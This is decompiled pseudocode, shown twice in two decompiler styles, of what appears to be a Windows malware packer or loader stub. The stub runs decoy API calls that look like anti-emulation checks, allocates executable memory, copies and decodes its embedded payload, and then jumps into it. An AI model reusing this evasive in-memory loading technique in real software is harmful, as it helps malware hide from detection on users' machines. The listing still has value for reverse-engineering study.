word32 fn1310E09B()
{
SetErrorMode(0x5C000000);
ADVAPI32.dll!WmiReceiveNotificationsA();
GetStartupInfoA(fp + 0xFFFFFD6C);
ADVAPI32.dll!WmiSetSingleInstanceW();
Eq_63 * eax_36 = SafeArrayGetUBound(null, 0x0006C000, (LONG *) 0x00012C00);
if (eax_36 != (Eq_63 *) 0xFC110199 && eax_36 + 0x80010332 == eax_36 + 0xFFFD0199)
{
word32 ebx_303 = eax_36->dw9309E6A9;
fn1310E000(fp + 0xFFFFFDC4, fp + 0xFFFFFDC4, 0x00000004, fp - 0x00000010, 0x00000000, fp + 0xFFFFFDCC);
word32 edi_328 = eax_36->dw9309E6AD;
fn1310E000(fp + 0xFFFFFDA8, fp + 0xFFFFFDA4, 0x00000004, fp - 0x00000010, 0x00000004, fp + 0xFFFFFDCC);
ui32 edi_351 = eax_36->dw9309E6B1;
fn1310E000(fp - 0x00000014, fp - 0x0000001C, 0x00000004, fp - 0x00000010, 0x00000008, fp + 0xFFFFFDCC);
Eq_138 eax_378 = GetModuleHandleA(0x00000000);
word32 eax_386 = eax_36->dw9309E6B5;
fn1310E000(fp - 0x0000001C, fp - 0x00000028, 0x00000004, fp - 0x00000010, 0x0000000C, fp + 0xFFFFFDCC);
dwLoc0248 = eax_36->dw9309E6B9;
fn1310E000(fp + 0xFFFFFDB8, fp + 0xFFFFFDA8, 0x00000004, fp - 0x00000010, 0x00000010, fp + 0xFFFFFDCC);
word32 eax_449 = edi_351 * 0x00000008 + 0x0000000C;
dwLoc0258 = edi_328;
dwLoc14 = edi_351;
dwLoc20 = eax_378;
dwLoc024C = 0x00000014;
dwLoc24 = eax_36 + 0x9309E6BD;
dwLoc2C = eax_449;
dwLoc0260 = VirtualAlloc(0x00000000, eax_449 + edi_328 + ebx_303, 0x00003000, 0x00000040);
dwLoc0C = eax_386 + eax_378 + eax_449;
dwLoc0264 = eax_449;
dwLoc08 = 0x00000000;
dwLoc18 = 0x00000000;
goto l1310E32A;
}
l1310E32A:
while (0x00000001 != 0x00000000)
{
if (dwLoc0264 == dwLoc0248)
{
ui32 edx_221 = dwLoc08 + 0x00000001;
dwLoc08 = edx_221;
if (edx_221 == dwLoc14)
goto l1310E45A;
word32 edx_227 = dwLoc24->dw0000;
fn1310E000(fp - 0x0000001C, fp - 0x0000001C - dwLoc024C, 0x00000004, fp - 0x00000010, dwLoc024C, fp + 0xFFFFFDCC);
Eq_253 * esi_257 = &dwLoc24->t0004;
word32 ebx_254 = dwLoc024C + 0x00000004;
dwLoc0248 = esi_257->dw0000;
fn1310E000(fp + 0xFFFFFDB8, fp + 0xFFFFFDB8 - ebx_254, 0x00000004, fp - 0x00000010, ebx_254, fp + 0xFFFFFDCC);
dwLoc024C = ebx_254 + 0x00000004;
dwLoc24 = esi_257 + 0x00000004;
dwLoc0264 = 0x00000000;
dwLoc0C = edx_227 + dwLoc20;
goto l1310E415;
}
l1310E415:
dwLoc0260->b0000 = dwLoc0C->b0000;
dwLoc0C = dwLoc0C + 1;
dwLoc18 = dwLoc18 + 0x00000001;
dwLoc0264 = dwLoc0264 + 0x00000001;
}
l1310E45A:
word32 eax_147 = fn1310E000(dwLoc0260, dwLoc0260 - dwLoc2C, dwLoc0258, fp + 0xFFFFFDC8, dwLoc2C, fp + 0xFFFFFDCC);
(dwLoc0260 + 0x00000F50)();
return eax_147;
}
// address: 0x1310e09b
int main(int argc, char *argv[], char *envp[]) {
__size8 al; // r8
__size16 ax; // r0
char bl; // r11
__size8 cl; // r9
__size16 cx; // r1
unsigned char dl; // r10
__size16 dx; // r2
unsigned char *eax; // r24
void *eax_1; // r24{45}
__size32 eax_2; // r24{185}
__size32 eax_3; // r24{486}
__size32 ebp; // r29
int ebx; // r27
char *ebx_1; // r27
int ebx_2; // r27{84}
__size32 ecx_1; // r25{18}
unsigned int edi; // r31
char *edi_1; // r31
unsigned int edi_2; // r31{116}
unsigned int edx; // r26
unsigned char *esi; // r30
int esp; // r28
void *esp_1; // r28{67}
void *esp_2; // r28{309}
void *esp_3; // r28{541}
void *esp_4; // r28{559}
__size32 local0; // m[esp - 16]
unsigned int local1; // m[esp - 8]
__size8 local10; // m[esp - 560]
__size8 local11; // m[esp - 562]
__size8 local12; // m[esp - 563]
__size8 local13; // m[esp - 564]
int local14; // m[esp - 572]
unsigned int local15; // m[esp - 580]
unsigned char *local16; // m[esp - 584]
void *local17; // m[esp - 588]
__size32 local18; // m[esp - 596]
unsigned int local19; // m[esp - 600]
unsigned char *local2; // m[esp - 12]
unsigned char *local20; // m[esp - 608]
void *local21; // m[esp - 612]
__size32 local22; // m[esp - 780]
__size32 local23; // m[esp - 784]
int local24; // m[esp - 788]
__size32 local25; // m[esp - 792]
unsigned int local26; // m[esp - 796]
unsigned int local27; // m[esp - 800]
unsigned int local28; // m[esp - 804]
union { void * x151; int x152; } local29; // m[esp - 576]
unsigned int local3; // m[esp - 20]
unsigned int local30; // m[esp - 776]
int local35; // m[esp - 584]
int local4; // m[esp - 24]
char *local5; // m[esp - 28]
unsigned int local58; // m[esp - 8]{573}
__size32 local6; // m[esp - 32]
void *local63; // esp_3{541}
unsigned int local64; // local1{603}
union { unsigned char * x149; int x150; } local65; // local16{607}
union { int x143; __size32 * x144; } local7; // m[esp - 36]
void *local8; // m[esp - 40]
unsigned char *local9; // m[esp - 44]
ecx_1 = SetErrorMode();
WmiReceiveNotificationsA();
GetStartupInfoA();
eax_1 = SafeArrayGetUBound();
local29 = eax_1 - 0x2fe67;
eax = WmiSetSingleInstanceW(); /* Warning: also results in edx, esp_1 */
local63 = esp_1;
if ( !(edx == 0x3ec0000 || eax - 0x7ffbfe67 != eax_1 - 0x2fe67)) {
local13 = -15;
local12 = 28;
local10 = 117;
local29 = eax_1 - 0x6cf61957;
ebx_2 = *(eax_1 - 0x6cf61957);
local14 = ebx_2;
bl = proc1(&ebx_2, esp - 572, 4, &local0, 0, &-15, bl, ebx_2);
local8 = esp;
local11 = -26;
edi_2 = *(eax_1 - 0x6cf61953);
local19 = edi_2;
bl = proc1(&edi_2, (esp - 604), 4, &local0, 4, &-15, bl, esp - 600);
edi = *(eax_1 - 0x6cf6194f);
local3 = edi;
bl = proc1(&edi, esp - 28, 4, &local0, 8, &-15, bl, esp - 28);
local30 = 0;
eax_2 = GetModuleHandleA();
local6 = eax_2;
local18 = eax_2 + 0x1000;
eax = *(eax_1 - 0x6cf6194b);
bl = proc1(&eax, esp - 40, 4, &local0, 12, &-15, bl, esp - 28); /* Warning: also results in ebx */
local5 = eax + eax_2;
esi = *(eax_1 - 0x6cf61947);
local16 = esi;
local27 = esp - 584;
ax = proc1(&esi, esp - 600, 4, &local0, 16, &-15, bl, ebx); /* Warning: also results in cx, dx, al, cl, bl */
local17 = 20;
local7 = eax_1 - 0x6cf61943;
local9 = edi * 8 + 12;
local22 = 64;
local23 = 0x3000;
ebx = edi * 8 + edi_2 + 12;
local24 = ebx + ebx_2;
local25 = 0;
eax = VirtualAlloc(0, ebx + ebx_2, 0x3000, 64); /* Warning: also results in esp_2 */
local63 = esp_2;
local20 = eax;
edi_1 = eax + eax_2 + edi * 8 + 12;
local2 = edi_1;
local15 = edi * 8 + 12;
local21 = edi * 8 + 12;
local1 = 0;
local4 = 0;
}
for(;;) {
esp_3 = local63;
local58 = local1;
local64 = local58;
local65 = local16;
if (local21 != local16) {
goto L0;
}
local1 = local58 + 1;
local64 = local1;
if (local1 == local3) {
*(union { void * x171; int x172; }*)(esp_3 - 4) = esp - 564;
*(unsigned char **)(esp_3 - 8) = local9;
*(union { void * x173; int x174; }*)(esp_3 - 12) = (esp - 568);
*(unsigned int*)(esp_3 - 16) = local19;
ecx = local20 - local9;
*(int*)(esp_3 - 20) = ecx;
*(unsigned char **)(esp_3 - 24) = local20;
eax_3 = proc1(*(esp_3 - 24), *(esp_3 - 20), *(esp_3 - 16), *(esp_3 - 12), *(esp_3 - 8), *(esp_3 - 4), bl, esp - 568); /* Warning: also results in ax, cx, dx, al, cl, bl, edx, edi */
*(void **)(esp_3 - 4) = local8;
*(union { void * x175; int x176; }*)(esp_3 - 8) = esp - 564;
*(unsigned int*)(esp_3 - 12) = local19;
*(int*)(esp_3 - 16) = local14;
*(unsigned char **)(esp_3 - 20) = local20;
esi = local20 + local19;
*(void **)(esp_3 - 24) = esi;
(*local20 + 0xf50)(local28, local27, local26, local25, local24, local23, local22, local30, 0x15000, 0, 0x5d000000, 0xe6000, 0x370000, 0x328000, 0, 0x6c000, 0x12c00, (esp - 660), 0, ecx_1, 0x5c000000, (esp - 544), eax, local20 + 0xf50, local20 + 0xf50, local21, local20, local19, local18, local17, local16, local15, local29, local14, local13, local12, local11, -38, local10, local9, local8, local7, local6, local5, local4, local3, local0, local2, local58 + 1, ebp, argc, argv, envp, ax, cx, dx, al, cl, (unsigned char) local58 + 1, bl, eax_3, local14, edx, local20, esp - 4, esi, edi, ADDFLAGS32(local20, local19, esi), ADDFLAGS32(local20, local19, esi), ADDFLAGS32(local20, local19, esi));
return eax;
}
edx = *local7;
*(union { void * x159; int x160; }*)(esp_3 - 4) = esp - 564;
*(void **)(esp_3 - 8) = local17;
*(union { void * x161; int x162; }*)(esp_3 - 12) = esp - 16;
*(__size32*)(esp_3 - 16) = 4;
esi = esp - local17 - 28;
*(union { unsigned char * x147; int x148; }*)(esp_3 - 20) = esi;
*(union { void * x163; int x164; }*)(esp_3 - 24) = esp - 28;
bl = proc1(*(esp_3 - 24), *(esp_3 - 20), *(esp_3 - 16), *(esp_3 - 12), *(esp_3 - 8), *(esp_3 - 4), bl, esp - 28);
ebx_1 = edx + local6;
local5 = ebx_1;
local17 += 4;
local7 += 4;
ebx = *local7;
local35 = ebx;
*(union { void * x165; int x166; }*)(esp_3 - 4) = esp - 564;
*(void **)(esp_3 - 8) = local17;
*(union { void * x167; int x168; }*)(esp_3 - 12) = esp - 16;
*(__size32*)(esp_3 - 16) = 4;
edi = esp - local17 - 584;
*(int*)(esp_3 - 20) = edi;
*(union { void * x169; int x170; }*)(esp_3 - 24) = esp - 584;
ax = proc1(*(esp_3 - 24), *(esp_3 - 20), *(esp_3 - 16), *(esp_3 - 12), *(esp_3 - 8), *(esp_3 - 4), bl, ebx); /* Warning: also results in cx, dx, al, cl, bl */
local65 = local35;
local17 += 4;
local7 += 4;
local21 = 0;
local2 = ebx_1;
L0:
esp_4 = esp_3;
local1 = local64;
local16 = local65;
ebx_1 = local20 + local4;
dl = *local2;
*(unsigned char*)ebx_1 = dl;
local2++;
local4++;
local21++;
local15++;
local63 = esp_4;
local63 = esp_4;
}
}